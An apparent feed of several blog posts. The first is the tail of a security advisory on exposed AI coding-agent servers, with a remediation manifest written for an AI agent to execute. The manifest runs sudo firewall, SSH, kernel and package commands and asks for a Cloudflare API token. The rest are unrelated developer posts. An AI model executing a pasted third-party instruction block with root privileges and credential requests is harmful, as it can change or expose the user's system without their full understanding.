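            return True
    except OSError:
        return False

if __name__ == "__main__":
    # Add your LAN or public IP here to test reachability from outside localhost.
    for host in ("127.0.0.1",):
        print(host, 4096, "OPEN" if is_port_open(host, 4096) else "closed")
```

If the port answers on your public IP but not after `ufw deny 4096`, the firewall rule is doing its job.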

If you run an agent on a Mac Mini or local machine

  1. Check the bind address now. Run lsof -i :4096 — if it shows *:4096, your agent is exposed to your entire network.
  2. Force localhost binding. Restart the agent with --host 127.0.0.1.
  3. Enable the macOS firewall. Block all incoming. Enable stealth mode.
  4. Use SSH tunneling for remote access. Never expose the agent's port on the network directly.
  5. Enable FileVault. If someone can physically access the Mac Mini, they should not be able to read the disk.
  6. Scope the agent's permissions. This is your defense against malicious packages and prompt injection. Read-only agents for auditing, scoped agents for deployment.

This month (both platforms)

  1. Monitor for compromise. Check for unauthorized SSH keys in ~/.ssh/authorized_keys. Check for unexpected cron jobs (VPS) or Launch Agents (macOS). Review outbound network connections for unfamiliar destinations.
  2. Audit installed packages. Review what the agent has installed. Check for packages you did not explicitly request.
  3. Review environment variables. If API keys, database credentials, or tokens are in your shell environment, the agent (and any malicious code it executes) has access to all of them. Use a secrets manager or scoped .env files instead of global exports.
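The reason global exports are dangerous is that every child process inherits `os.environ` wholesale. A scoped alternative is to parse a per-task `.env` file and inject it only into the process that needs it. The sketch below is a hedged illustration — `parse_env_file` and `run_with_secrets` are hypothetical helper names, not a real library API.

```python
# Sketch: hand secrets to one subprocess instead of exporting them globally.
# A globally exported API key is visible to anything the agent runs; a scoped
# .env file injected per-command narrows that blast radius.
import os
import subprocess

def parse_env_file(text: str) -> dict[str, str]:
    """Parse simple KEY=VALUE lines, skipping blanks and # comments."""
    env = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        env[key.strip()] = value.strip().strip('"')
    return env

def run_with_secrets(cmd: list[str], env_file_text: str) -> subprocess.CompletedProcess:
    """Run cmd with the base environment plus secrets from a scoped .env file."""
    child_env = {**os.environ, **parse_env_file(env_file_text)}
    return subprocess.run(cmd, env=child_env, capture_output=True, text=True)
```

A secrets manager is still the better answer; this only shows why "one `.env` per task" beats "export everything in `.zshrc`".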

Let your agent fix this for you

You just read 4,000 words of vulnerability analysis and remediation steps. Your AI coding agent — the one this article is about — can execute every one of them.

Copy the block below. Paste it into your agent's chat. Say: "Do this."

The agent will read the manifest, execute each step in order, stop when a condition isn't met, and ask you for credentials only when it needs them. It will not guess. It will not skip.

This is how security advisories should work in 2026. Not "read this and figure it out" — but "read this and execute."

Agent-Executable Remediation: CVE-2026-22812 / CVE-2026-22813

## Agent-Executable Remediation Manifest
## CVE-2026-22812 (CVSS 8.8) + CVE-2026-22813 (CVSS 9.6)
## Source: Hodge Luke Digital Intelligence Agency
## Target: Any VPS or macOS machine running an AI coding agent

### INSTRUCTIONS FOR AGENT
Execute each step sequentially. Do not skip steps.
STOP_IF conditions halt execution — explain why to the user and await instructions.
ASK_USER directives require user input before proceeding — do not guess values.
All commands must be run with appropriate privileges (sudo where indicated).
Report the result of each step before moving to the next.

---

### Step 0: Detect platform
Run: uname -s
IF output contains "Darwin" → SET PLATFORM=macos
IF output contains "Linux" → SET PLATFORM=linux
REPORT: "Detected platform: [PLATFORM]"

---

### Step 1: Check if an agent HTTP server is running
IF PLATFORM=linux:
  Run: ss -tlnp | grep -E ':(4096|3000|8080|8888) '
IF PLATFORM=macos:
  Run: lsof -i -P | grep -E ':(4096|3000|8080|8888) .*(LISTEN)'

STOP_IF: No output (no agent server detected — this machine may not be affected)
REPORT: "Found agent server listening on: [port and address]"

IF output shows 0.0.0.0 or *: → REPORT: "WARNING: Agent is bound to all
interfaces — exposed to the network. Proceeding with remediation."
IF output shows 127.0.0.1 only → REPORT: "Agent is bound to localhost only.
Network exposure is limited. Continuing with hardening steps."

---

### Step 2: Block the port immediately
IF PLATFORM=linux:
  Run: sudo ufw status
  IF ufw is inactive:
    Run: sudo ufw default deny incoming
    Run: sudo ufw default allow outgoing
    Run: sudo ufw allow ssh
    Run: sudo ufw --force enable
  Run: sudo ufw deny [detected port from Step 1]
  Run: sudo ufw reload
  REPORT: "Firewall enabled. Port [port] blocked."

IF PLATFORM=macos:
  Run: sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
  IF firewall is disabled:
    Run: sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate on
  Run: sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setblockall on
  Run: sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setstealthmode on
  REPORT: "macOS firewall enabled. All incoming blocked. Stealth mode on."

---

### Step 3: Force localhost binding
IF PLATFORM=linux:
  Check if agent is managed by systemd:
    Run: systemctl list-units --type=service | grep -i -E 'opencode|claw'
  IF found:
    REPORT: "Agent is running as systemd service: [service name]"
    ASK_USER: "Should I modify the service to bind to 127.0.0.1 only? (yes/no)"
    IF yes:
      Run: sudo mkdir -p /etc/systemd/system/[service].d
      Write override.conf with Environment="HOST=127.0.0.1"
      Run: sudo systemctl daemon-reload
      Run: sudo systemctl restart [service]

IF PLATFORM=macos:
  REPORT: "On macOS, restart your agent with: --host 127.0.0.1"
  REPORT: "Example: opencode serve --host 127.0.0.1"
  ASK_USER: "What is the command you use to start your agent? I will provide
  the modified command with localhost binding."

---

### Step 4: Install Cloudflare Tunnel (optional but recommended)
ASK_USER: "Do you want to set up a Cloudflare Tunnel for secure remote
access? This requires a Cloudflare account. (yes/no)"

STOP_IF: User says no (skip to Step 5)

ASK_USER: "Please provide your Cloudflare API token with Zone:DNS:Edit and
Account:Cloudflare Tunnel:Edit permissions."
ASK_USER: "What domain do you want to use for accessing the agent?
(e.g., agent.yourdomain.com)"

IF PLATFORM=linux:
  Run: curl -fsSL https://pkg.cloudflare.com/cloudflare-main.gpg \
    | sudo gpg --dearmor -o /usr/share/keyrings/cloudflare.gpg
  Run: echo "deb [signed-by=/usr/share/keyrings/cloudflare.gpg] \
    https://pkg.cloudflare.com/cloudflared $(lsb_release -cs) main" \
    | sudo tee /etc/apt/sources.list.d/cloudflared.list
  Run: sudo apt update && sudo apt install -y cloudflared

IF PLATFORM=macos:
  Run: brew install cloudflare/cloudflare/cloudflared

Run: cloudflared tunnel login
Run: cloudflared tunnel create agent-tunnel
Write config.yml:
  tunnel: [tunnel-id]
  credentials-file: /root/.cloudflared/[tunnel-id].json
  ingress:
    - hostname: [user-provided domain]
      service: http://localhost:[detected port]
    - service: http_status:404
Run: cloudflared tunnel route dns agent-tunnel [user-provided domain]
Run: cloudflared tunnel run agent-tunnel

REPORT: "Tunnel created. Agent accessible at https://[domain].
No inbound ports required."

---

### Step 5: Harden the host
IF PLATFORM=linux:
  Run: sudo apt install -y fail2ban
  Run: sudo systemctl enable fail2ban

  Write /etc/sysctl.d/99-agent-hardening.conf:
    net.ipv4.tcp_syncookies = 1
    net.ipv4.conf.all.rp_filter = 1
    net.ipv4.icmp_echo_ignore_broadcasts = 1
    net.ipv4.conf.all.accept_redirects = 0
    kernel.randomize_va_space = 2
    net.ipv4.conf.all.log_martians = 1
  Run: sudo sysctl --system

  Run: sudo apt install -y unattended-upgrades
  Run: sudo dpkg-reconfigure -plow unattended-upgrades

  REPORT: "Host hardened: fail2ban active, kernel parameters set,
  automatic security updates enabled."

IF PLATFORM=macos:
  Run: sudo fdesetup status
  IF FileVault is off:
    REPORT: "FileVault (disk encryption) is disabled."
    ASK_USER: "Enable FileVault? This encrypts your entire disk.
    Requires restart. (yes/no)"
    IF yes: Run: sudo fdesetup enable

  Run: sudo softwareupdate --schedule on
  REPORT: "macOS hardened: firewall active, stealth mode on,
  automatic updates enabled."

---

### Step 6: Disable SSH password authentication
IF PLATFORM=linux:
  Run: grep -E '^PasswordAuthentication' /etc/ssh/sshd_config
  IF set to yes:
    Run: sudo sed -i 's/^PasswordAuthentication yes/PasswordAuthentication no/' \
      /etc/ssh/sshd_config
    Run: sudo systemctl restart sshd
    REPORT: "SSH password authentication disabled. Key-only access."

IF PLATFORM=macos:
  Run: sudo systemsetup -getremotelogin
  IF Remote Login is on:
    ASK_USER: "SSH is enabled. Do you need remote SSH access to this
    machine? (yes/no)"
    IF no:
      Run: sudo systemsetup -setremotelogin off
      REPORT: "SSH disabled entirely."
    IF yes:
      Run: sudo sed -i '' 's/^#PasswordAuthentication yes/PasswordAuthentication no/' \
        /etc/ssh/sshd_config
      Run: sudo launchctl stop com.openssh.sshd
      Run: sudo launchctl start com.openssh.sshd
      REPORT: "SSH password authentication disabled. Key-only access."

---

### Step 7: Verify remediation
IF PLATFORM=linux:
  Run: ss -tlnp | grep -E ':(4096|3000|8080|8888) '
  Run: sudo ufw status verbose
  Run: systemctl is-active fail2ban

IF PLATFORM=macos:
  Run: lsof -i -P | grep -E ':(4096|3000|8080|8888) .*(LISTEN)'
  Run: sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
  Run: sudo fdesetup status

REPORT: "Remediation complete. Summary:"
REPORT: "- Agent bind address: [current binding]"
REPORT: "- Firewall: [status]"
REPORT: "- SSH hardening: [status]"
REPORT: "- Host hardening: [status]"
REPORT: "- Tunnel: [configured/not configured]"
REPORT: "- Disk encryption: [status, macOS only]"

---

### What this manifest does NOT cover (requires manual review)
- Layer 2 (Zero Trust Access): Requires Cloudflare dashboard configuration
  for identity provider integration. See the full article for policy setup.
- Layer 5 (MCP permission scoping): Requires agent-specific configuration
  based on your tool chain. See the full article for examples.
- Supply chain audit: Review installed packages manually.
  Run: pip list / npm list -g / cargo install --list
- Credential rotation: If your agent was exposed, assume all environment
  variables, SSH keys, and API tokens accessible to the agent process are
  compromised. Rotate them.

This is the first security advisory we've published with an agent-executable remediation manifest. We believe every security disclosure that tells developers what to do should let their tools do it for them. We'll be publishing these with every advisory going forward.

The architecture we built

We built FORGE because we were setting up AI coding agent infrastructure for clients and kept solving the same security problems from scratch — every time. Cloudflare Tunnel configuration. Zero Trust access policies. WebSocket cookie conflicts. Kernel hardening. MCP server scoping. The same 1,000 lines of battle-tested bash with rollback on failure.

FORGE implements all five layers described in this article as a single deployment script. One command. Under 10 minutes. The agent runs on your VPS, behind your tunnel, gated by your identity, hardened to CIS baselines, with MCP servers pre-configured and scoped.

It is not a hosted service. You own the server. You own the code. You own the infrastructure. The $47 Developer Edition buys the architecture, security model, and deployment automation. Your VPS costs about $7/month. There is no recurring fee to us.

We built it because the gap between "start the server" and "run the server securely" should not require 1,000 lines of infrastructure automation that every developer has to figure out from scratch. FORGE closes that gap.

Sources

  1. CVE-2026-22812. National Vulnerability Database (NVD/NIST). CVSS 8.8. Unauthenticated remote code execution in OpenCode HTTP server.
  2. CVE-2026-22813. National Vulnerability Database (NVD/NIST). CVSS 9.6. Cross-site scripting to remote code execution via unsanitized LLM output in OpenClaw web UI.
  3. 220,000+ exposed instances. Cumulative findings from Censys, Bitsight, Bitdefender, and Penligent internet-wide scans, January–March 2026.
  4. 15,200 confirmed RCE-vulnerable instances. Penligent research report, Q1 2026.
  5. 53,300 instances correlated with breach activity. SecurityScorecard STRIKE team analysis, Q1 2026.
  6. 1,184 malicious ClawHub packages. CyberDesserts supply chain analysis, February 2026.
  7. 1.5 million leaked API tokens and 35,000 email addresses. Infosecurity Magazine report on Supabase breach affecting AI agent deployments, March 2026.
  8. AI agent market $7.8–10.9B (2026), projected $52B by 2030. Industry composite estimates (Gartner, McKinsey, CB Insights).
  9. 92% of US developers use AI coding tools daily. GitHub developer survey, 2026.
  10. 41% of all code is AI-generated. Google internal metrics, reported Q1 2026.
  11. 24.7% of AI-generated code contains security flaws. Snyk Code analysis, 2025–2026.
  12. MCP: 97 million monthly SDK downloads, 10,000+ servers. Linux Foundation MCP governance announcement, March 2026.
  13. Nate B. Jones, "5 Skills" framework. AI News & Strategy Daily, published March 16, 2026. Framework for AI agent management: prompting, context management, iteration, evaluation, deployment.
  14. NVIDIA NemoClaw. GTC 2026 announcement, NVIDIA Newsroom. Enterprise security wrapper for OpenClaw.
  15. Apple Mac Mini supply constraints. M4 and M4 Pro configurations backordered across major retailers, Q1 2026. Developer community reports attribute demand to local AI agent hosting on Apple Silicon unified memory architecture.

About the author

Hodge Luke is the founder of Hodge Luke Digital Intelligence Agency and the creator of FORGE — a security-hardened deployment platform for AI coding agents built on Cloudflare's edge network. FORGE implements the 5-layer defense-in-depth model described in this article as a one-command deployment.

Hodge Luke | Two Guys and some Bots | forge.useacceda.com

I built an AI wardrobe app by myself. Here's what actually happened.

2026-03-31 06:28:14

Solo dev, no funding, one app that needed to work offline and think online. Why the architecture ended up the way it did.

I spent the last several months building an AI-powered wardrobe app called Outfii. No cofounders, no funding, no team. Just me, too much chai, and a mass of decisions I wasn't qualified to make.

You photograph your clothes, the app organizes them, and AI helps you figure out what to wear. It's on Google Play now. Here's how it actually went.

The problem that wouldn't leave me alone

Every morning, same thing. Full closet, nothing to wear. I looked it up and apparently most people regularly use about 20% of what they own. The rest just hangs there.

I don't have a fashion background. But "help me combine clothes I already own" felt like something code could handle. Whether I was the right person to build it is still an open question.

Why the app needs two brains

This is the part that shaped every other decision.

Some things need to happen instantly. When you're flipping through outfit options, you can't be waiting on a server to tell you whether navy and olive work together. That feedback loop needs to be under 50ms or it feels broken.

Other things need actual intelligence. Looking at a photo and figuring out "that's a linen shirt, it's dusty rose, semi-formal" requires a vision model. Suggesting what to wear tomorrow based on your wardrobe, the weather, and what you wore this week requires an LLM.

So the app has two brains. One lives on your phone. One lives in the cloud. They do completely different jobs.

The on-device brain handles color analysis, harmony scoring, and outfit compatibility. I tried doing this in Dart first. It was too slow. Color distance calculations in tight loops, converting between color spaces, running harmony checks across every item pair in a wardrobe. Dart isolates helped but added complexity without solving the core problem: CPU-bound math needs compiled code. I rewrote it in Rust, bridged to Flutter via flutter_rust_bridge. Scoring now runs in ~20-30ms on a mid-range Android phone. The Rust binary adds about 4MB to the APK, which felt worth it.

The scoring algorithm itself went through three complete rewrites. Telling navy from black programmatically is genuinely hard. CIE Delta E gets you close, but perceptual color difference is still messy at the dark end of the spectrum. Your eyes handle this effortlessly. Code does not.
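For readers unfamiliar with Delta E: the app's real engine is Rust and presumably far more refined, but the textbook version the article alludes to — CIE76, a Euclidean distance in CIELAB space — can be sketched in a few lines. This is a generic illustration, not Outfii's actual algorithm.

```python
# Sketch of the classic CIE76 Delta E distance: convert sRGB to CIELAB
# (D65 white point), then take the Euclidean distance in Lab space.
import math

def _srgb_to_linear(c: float) -> float:
    c /= 255.0
    return c / 12.92 if c <= 0.04045 else ((c + 0.055) / 1.055) ** 2.4

def rgb_to_lab(rgb: tuple[int, int, int]) -> tuple[float, float, float]:
    r, g, b = (_srgb_to_linear(c) for c in rgb)
    # Linear sRGB -> XYZ (D65)
    x = 0.4124 * r + 0.3576 * g + 0.1805 * b
    y = 0.2126 * r + 0.7152 * g + 0.0722 * b
    z = 0.0193 * r + 0.1192 * g + 0.9505 * b
    xn, yn, zn = 0.95047, 1.0, 1.08883  # D65 reference white

    def f(t: float) -> float:
        return t ** (1 / 3) if t > (6 / 29) ** 3 else t / (3 * (6 / 29) ** 2) + 4 / 29

    fx, fy, fz = f(x / xn), f(y / yn), f(z / zn)
    return 116 * fy - 16, 500 * (fx - fy), 200 * (fy - fz)

def delta_e76(rgb1, rgb2) -> float:
    """Euclidean distance in Lab; ~2.3 is roughly a just-noticeable difference."""
    l1, a1, b1 = rgb_to_lab(rgb1)
    l2, a2, b2 = rgb_to_lab(rgb2)
    return math.sqrt((l1 - l2) ** 2 + (a1 - a2) ** 2 + (b1 - b2) ** 2)
```

Navy `(0, 0, 128)` vs black `(0, 0, 0)` comes out clearly distinct in Lab even though both read as "dark" — but near the dark end, small RGB changes produce disproportionate Lab jumps, which is exactly the messiness the article describes.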

The cloud brain handles understanding. When you scan a clothing item, an edge function sends the photo to a vision model that identifies type, color, pattern, material. When you ask for outfit suggestions, another function builds context from your wardrobe and passes it to an LLM. Different tasks, different models. Cloud response times vary (2-8 seconds depending on the model and task), which is fine because these aren't real-time interactions.

The two never overlap. Scoring is always local. Understanding is always cloud. This means the core app works offline, which matters a lot in India where connectivity is unpredictable.

The BYOK question

AI features cost money to run. I'm bootstrapped. Subsidizing API calls for every user isn't sustainable.

So I built a bring-your-own-key system. Users can plug in their own OpenAI or Anthropic API key and get the full AI experience without paying me a subscription. Keys are encrypted on the phone and never touch our servers in plaintext. There are also paid tiers for people who don't want to think about API keys.

This was controversial in my head for a while. "Asking users to get their own API key" sounds like terrible UX. But it turns out there's a niche of technical users who actually prefer this. They like knowing exactly what model runs, what it costs, and that their data goes to the provider they chose. It's not for everyone, but it's a real segment.

Everything lives on your phone first

The wardrobe is stored locally in SQLite. Not as a cache. As the source of truth.

I didn't want the app to break when you lose signal. You should be able to browse your wardrobe, check outfit history, and get scoring results in airplane mode. Cloud sync happens in the background when you're online.

The downside is sync conflicts. Two devices editing the same wardrobe creates problems I'm still working through. Last-write-wins is what I ship with for now, but it's not great when someone adds items on a tablet and a phone simultaneously. Solving this properly is on the list.
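Last-write-wins is simple enough to fit in a few lines, which is both its appeal and its flaw. The sketch below shows the strategy described above; field names are illustrative, not the app's actual schema.

```python
# Last-write-wins merge: when two devices edit the same wardrobe item,
# keep whichever copy carries the newer updated_at timestamp.
def merge_lww(local: dict, remote: dict) -> dict:
    """Resolve a per-item conflict by updated_at; ties keep the local copy."""
    return remote if remote["updated_at"] > local["updated_at"] else local

def sync(local_items: dict[str, dict], remote_items: dict[str, dict]) -> dict[str, dict]:
    """Merge two item maps keyed by item id."""
    merged = dict(local_items)
    for item_id, remote in remote_items.items():
        merged[item_id] = merge_lww(merged[item_id], remote) if item_id in merged else remote
    return merged
```

The failure mode falls out directly: a tablet edit with an older timestamp silently loses, even if it was the edit the user cared about.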

What went wrong

I shipped too many features at launch. Wardrobe management, AI outfits, weather integration, trip packing, laundry tracking, wear reminders, style profiles. That's three apps pretending to be one. Should've shipped wardrobe + AI outfits and added the rest over time.

My Play Store screenshots were raw app captures. Status bars visible. Timestamps. Battery icons. No marketing framing. People decide whether to install your app in about two seconds of scrolling, and I gave them nothing to work with. Still fixing this weeks later.

Debugging across the Rust bridge was also painful early on. When something panics in Rust, the error you get on the Flutter side is not always helpful. I spent a full day on a crash that turned out to be a type mismatch in the FFI layer that codegen silently accepted. Added a lot of defensive logging after that.

I also copy-pasted boilerplate across backend functions for months before building a shared utilities layer. Auth middleware, response helpers, error formatting, all duplicated. Embarrassing but honest.

What went right

The blog was a good early bet. I wrote about color theory in fashion, capsule wardrobe math, pattern mixing rules. Technical content at the intersection of fashion and algorithms. Five posts, bringing in organic search traffic before anyone even downloads the app.

The on-device scoring engine was painful to set up but it's a genuine differentiator. Most wardrobe apps send every request to a server. Having instant, offline scoring on a 29MB app feels noticeably better. Users don't know it's Rust running on their phone. They just know it's fast.

Where it's going

Social features are rolling out. Users can share outfit combinations. After that, iOS and a web app.

The developer account is under Clarixo, my parent brand. Outfii is the first product. Bootstrapped, planning to stay that way.

If you want to try it: outfii.in

Play Store: Outfii - AI Wardrobe Stylist

If you're building solo, optimize for decisions you can live with for a while. The architecture won't be perfect. Ship the version that's good enough, then fix the parts that actually hurt.

Claude Feels Slow. But Is Moving a Team to Open-Weight Models Actually the Fix?

2026-03-31 06:21:51

TL;DR

Claude has a real speed problem for our team — but mostly in TTFT, not in raw decoding speed.

I measured our actual usage and found this:

  • TTFT p50: 4.2s–6.8s
  • TTFT p90: 14.5s–28.1s
  • Claude Sonnet decode p50: 176 tok/s

That explains the feeling: Claude often isn’t that slow once it starts, but sometimes it takes so long to begin that the whole thing feels like it’s crawling.

That naturally raises the next question:

Should we move the team to self-hosted open-weight models?

At first glance, that sounds promising. Self-hosted setups can have dramatically better TTFT. In the numbers I looked at, open-weight deployments were often estimated around 150–600ms TTFT, versus Claude’s 4–7s median in our real usage.

But once I looked at the actual team setup — 10 engineers sharing one GPU budget — the answer stopped looking obvious.

The best open-weight models need serious multi-GPU infra, and once that infra is shared, the speed case starts looking surprisingly shaky.

So this post is not “open source bad.”

It’s a narrower question:

If Claude feels slow, is moving a team to open-weight models on shared infra actually the answer?

Right now, I’m not convinced.

The problem: Claude feels like it crawls

This started with a very practical complaint:

Claude is slow.

That could mean a lot of things, so I measured it.

From about 50 session files and roughly 3,000 API calls, the problem was clear: the main issue was TTFT, especially in the tail.

TTFT from our real usage

| Trigger | p10 | p50 | p90 |
| --- | --- | --- | --- |
| User message | 2.8s | 6.8s | 28.1s |
| Tool result | 2.5s | 4.2s | 14.5s |

That 28.1s p90 is the whole story.

Claude is not just “a bit laggy” there. It’s slow enough to break flow.
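For anyone wanting to reproduce this kind of table from their own session logs: percentile rows like the ones above can be computed from raw TTFT samples with the standard library alone. This is a generic sketch, not the author's actual measurement script.

```python
# Compute p10/p50/p90 from a list of raw latency samples (seconds).
import statistics

def percentiles(samples: list[float]) -> dict[str, float]:
    """Return p10/p50/p90 using inclusive (linear-interpolation) quantiles."""
    qs = statistics.quantiles(samples, n=10, method="inclusive")
    return {"p10": qs[0], "p50": statistics.median(samples), "p90": qs[8]}
```

Feed it per-trigger buckets (user messages vs. tool results) and you get one table row per bucket.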

The surprising part: decode speed wasn’t the main problem

Here’s the other half of the picture.

Generation speed

| Metric | p10 | p50 | p90 |
| --- | --- | --- | --- |
| Decode tok/s (excluding TTFT) | 72 | 178 | 567 |
| Wall tok/s (including TTFT) | 23 | 41 | 63 |

And per model:

| Model | TTFT p50 | Decode p50 |
| --- | --- | --- |
| Haiku 4.5 | 1.8s | 287 tok/s |
| Sonnet 4.6 | 4.2s | 176 tok/s |
| Opus 4.6 | 4.7s | 130 tok/s |

So the core problem wasn’t really:

Claude can’t stream fast enough.

It was:

Claude often takes too long to get started.

That distinction matters, because it makes self-hosting sound much more attractive than it might actually be.

Why open weights sound like the obvious answer

If TTFT is the problem, then self-hosting sounds like the clean fix.

The pitch is simple:

  • no provider-side queue
  • no shared API congestion
  • your own inference server
  • much lower TTFT

And the numbers I collected from the self-hosting side were definitely seductive.

Best-case self-hosted framing

| Metric | Claude now | Best self-hosted |
| --- | --- | --- |
| Tool-triggered TTFT p50 | 4,200ms | ~160ms |
| User-triggered TTFT p50 | 6,800ms | ~160ms |
| Bad-day p90 | 14,500ms+ | <400ms |

If TTFT were the only thing that mattered, I think this would already be enough to move seriously toward GPUs.

But TTFT is not the whole developer experience.

The models we’d actually consider

We’re not talking about toy models here. We’re talking about the real open-weight candidates people would actually put on the table.

Models considered

| Model | Why consider it? |
| --- | --- |
| Qwen3-Coder-Next | Fast MoE coding model, 80B total / 3B active |
| MiniMax M2.5 | Stronger quality candidate, 230B total / 10B active |
| DeepSeek V3.2 | Very large MoE option |
| Qwen3.5-27B | Dense, simpler, slower but cheaper |

And the inference engines are the standard ones you’d expect:

Inference engines

| Model family | Realistic inference engine |
| --- | --- |
| Qwen / DeepSeek | vLLM or SGLang |
| MiniMax M2.5 | vLLM |
| Dense smaller models | usually vLLM |

That means this isn’t some hypothetical future stack. It’s the standard modern self-hosted inference path.

The part that makes this much less exciting: GPU budgets are shared

This is the piece I think gets hand-waved away too often.

Our current setup is:

| Item | Value |
| --- | --- |
| Engineers | 10 |
| Claude subscription per engineer | $150/mo |
| Total Claude cost | $1,500/mo |

The budget I was willing to entertain for self-hosting was roughly 3× that, so about $4,500/month.

That sounds like a lot.

But for top open-weight coding models, it buys you something like this:

What the budget can buy

| Config | Cost/month | Notes |
| --- | --- | --- |
| 5× H100 on Vast.ai | $4,712 | Enough for MiniMax M2.5 / DeepSeek-class INT4 |
| 3× H100 on Lambda | $4,521 | More reliable, lower GPU count |
| 4× H200 on Vast.ai | $4,153 | Better memory bandwidth |
| 8× A100 on Vast.ai | $2,580 | Cheapest high-count option |

That’s not “10 engineers each get a fast private model.”

That’s one shared cluster.

And that changes the question completely.

The real metric is not TTFT. It’s team step time.

The right equation is not:

lower TTFT = faster experience

It’s more like:

team step time = queueing + TTFT + output_tokens / decode_speed

That’s the part that made me hesitate.

Because once you share one cluster across 10 engineers:

  • TTFT might improve
  • but per-user decoding might not
  • and queueing becomes part of the story

That is a very different situation from “look how fast this benchmark is on one box.”
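The step-time equation above can be turned into a toy calculator. The sketch below assumes the cluster's aggregate decode throughput splits evenly among concurrently active engineers and sets queueing to zero (which only flatters the shared case). The numbers are the article's illustrative figures, not benchmarks, and the 800-token step size is my own assumption.

```python
# Toy model of: team step time = queueing + TTFT + output_tokens / decode_speed
def step_time(ttft_s: float, decode_tok_s: float, output_tokens: int,
              queue_s: float = 0.0) -> float:
    return queue_s + ttft_s + output_tokens / decode_tok_s

out_tokens = 800  # a typical-ish agent step (assumption)

# Claude Sonnet today: ~4.2s TTFT p50, ~176 tok/s per user.
claude = step_time(ttft_s=4.2, decode_tok_s=176, output_tokens=out_tokens)

# Shared cluster: ~0.16s TTFT, ~2,000 tok/s aggregate, split among active users.
shared_5 = step_time(ttft_s=0.16, decode_tok_s=2000 / 5, output_tokens=out_tokens)
shared_10 = step_time(ttft_s=0.16, decode_tok_s=2000 / 10, output_tokens=out_tokens)

print(f"Claude: {claude:.1f}s  shared (5 active): {shared_5:.1f}s  "
      f"shared (10 active): {shared_10:.1f}s")
```

With 5 engineers active the shared cluster still wins comfortably; with all 10 active, per-user decode (~200 tok/s) barely beats Claude's 176 tok/s, and real queueing delay is still unmodeled. That is the "less clean" picture in one expression.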

Why I’m not yet sold

The self-hosted numbers I gathered looked like this:

Self-hosted decode estimates I considered

| Model | Config | INT4 decode tok/s |
| --- | --- | --- |
| Qwen3-Coder-Next | 2× H100 | ~3,400 |
| MiniMax M2.5 | 4× H100 | ~2,000 |
| MiniMax M2.5 | 2× H100 | ~1,000 |
| DeepSeek V3.2 | 5× H100 | ~700 |
| Qwen3.5-27B | 2× H100 | ~380 |
| Qwen3.5-27B | 1× H100 | ~190 |

Those numbers are exciting. They make open weights look like a no-brainer.

But they also raise exactly the question I still don’t think I’ve answered cleanly:

Are these the numbers one engineer feels, or the numbers a shared cluster produces in aggregate?

Because for a 10-person team, those are not the same thing.

And once I started looking at the problem through the lens of shared infra, the speed case stopped looking like an obvious slam dunk.

So where does that leave me?

I think I’ve convinced myself of a few things:

What seems true

| Statement | My current view |
| --- | --- |
| Claude has a real speed problem | Yes |
| The problem is mostly TTFT | Yes |
| Self-hosting probably improves TTFT a lot | Yes |
| The best open-weight models are expensive to run well | Yes |
| Shared infra weakens the speed story | Yes |
| Moving the whole team looks obviously promising | No |

That’s the interesting part.

The story I expected was:

Claude is slow, open weights are fast, buy GPUs, problem solved.

The story I actually found was:

Claude is slow mostly because of TTFT.
Open weights probably help that.
But once the infra is shared across a team, the speed case gets much less clean.

Bottom line

I started with a very simple frustration:

Claude felt slow.

I measured it and found a very specific issue:

TTFT, especially the p90 tail, was bad enough to make the whole experience feel like it was crawling.

That led to the obvious next idea:

What if we just move to open-weight models on our own GPUs?

And right now, my answer is not “definitely no.”

It’s this:

Open-weight models look promising for TTFT.

They look much less promising as a shared-infra speed fix for a whole team.

That’s the question I’m left with.

Not whether open weights are good.
Not whether they’re possible.
But whether they really solve the problem we actually have.

I built a Real-time Bus Reservation System with React & FastAPI 🚍

2026-03-31 06:20:01

Hey DEV community! 👋

For the past few weeks, I wanted to build something that solves a complex real-world problem. So, I built a complete "SaaS-in-a-box" Bus Reservation platform called Ani Travels.

My main challenge was handling concurrency—making sure two people looking at the same open seat cannot book it simultaneously.

🛠 The Tech Stack

  • Frontend: React (Vite) + Tailwind CSS + Framer Motion (smooth page transitions and an interactive seat map).
  • Backend: Python FastAPI (I fell in love with how fast and easy the asynchronous execution is).
  • Database: MongoDB.
  • Real-time Locking: WebSockets! As soon as a user selects a seat, an event is fired and the seat is locked across all active sessions instantly.
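The heart of the concurrency problem is an atomic check-and-set: two racing requests for the same seat, at most one wins. In the described stack that would be a single atomic MongoDB `find_one_and_update` with a `status: "free"` filter; the self-contained sketch below uses a mutex to stand in for that atomicity, and the class/field names are illustrative, not the project's actual code.

```python
# Sketch of atomic seat locking: concurrent attempts on one seat, one winner.
import threading

class SeatMap:
    def __init__(self, seats: list[str]):
        self._status = {s: "free" for s in seats}
        self._lock = threading.Lock()  # stands in for an atomic DB update

    def try_lock(self, seat: str, user: str) -> bool:
        """Atomically claim a seat; False if someone else got there first."""
        with self._lock:
            if self._status.get(seat) != "free":
                return False
            self._status[seat] = f"locked:{user}"
            return True
```

Once `try_lock` succeeds, the WebSocket layer broadcasts the lock so every other open session greys out the seat instantly — the broadcast propagates the invariant, but the atomic update is what enforces it.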

🌟 Features Implemented

  • Search bus routes and see results dynamically.
  • Interactive visual UI for Seat Selection (like MakeMyTrip/Redbus).
  • Checkout forms and backend payment processing flow.
  • A fully functional Admin Dashboard to add complete routes, assign buses, and monitor all platform bookings.

You can play around with the Live Demo here:
🔗 https://ani-travels-bus-booking.vercel.app

(Since the backend is on Render free tier, please excuse the initial 50-second cold start!)

I am selling the Complete Source Code along with detailed setup instructions if any entrepreneur or dev wants to skip 100+ hours of coding and launch their own startup/project immediately. It comes with seed scripts to populate DB instantly.

👉 Get the Full Source Code from my Gumroad

Would love to hear constructive feedback! How do you handle complex booking architectures in your apps?